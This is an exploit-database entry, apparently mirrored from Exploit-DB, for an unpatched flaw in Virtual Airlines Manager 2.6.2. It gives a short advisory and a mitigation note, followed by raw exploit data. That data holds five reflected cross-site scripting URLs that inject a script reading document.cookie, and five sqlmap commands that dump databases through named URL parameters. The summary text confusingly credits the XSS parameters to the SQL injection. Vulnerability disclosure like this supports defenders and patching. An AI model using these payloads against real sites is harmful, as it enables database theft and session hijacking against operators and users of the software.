header-logo
Suggest Exploit
vendor:
Virtual Airlines Manager
by:
Mosaaed
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Virtual Airlines Manager
Affected Version From: 2.6.2
Affected Version To: 2.6.2
Patch Exists: NO
Related CWE: N/A
CPE: a:virtual_airlines_manager:virtual_airlines_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2020

Virtual Airlines Manager 2.6.2 – ‘id’ SQL Injection

SQL Injection vulnerability exists in Virtual Airlines Manager 2.6.2. An attacker can inject malicious SQL queries via the 'id' parameter in the URL. For example, an attacker can inject malicious SQL queries via the 'registry_id', 'plane_icao', 'hub_id', 'plane_location' and 'event_id' parameters in the URL.

Mitigation:

Input validation should be performed to prevent SQL injection attacks. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
# Date: 2020-06-09
# Exploit Author: Mosaaed
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: N/A
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
 
-------------------
xss

http://localhost/vam/index.php?page=plane_info_public&registry_id=“><<script>alert(document.cookie);//<</script> 
http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
-------------------------
SQL Injection
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --db
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs

Navigation

Suggest Exploit

Services By CQR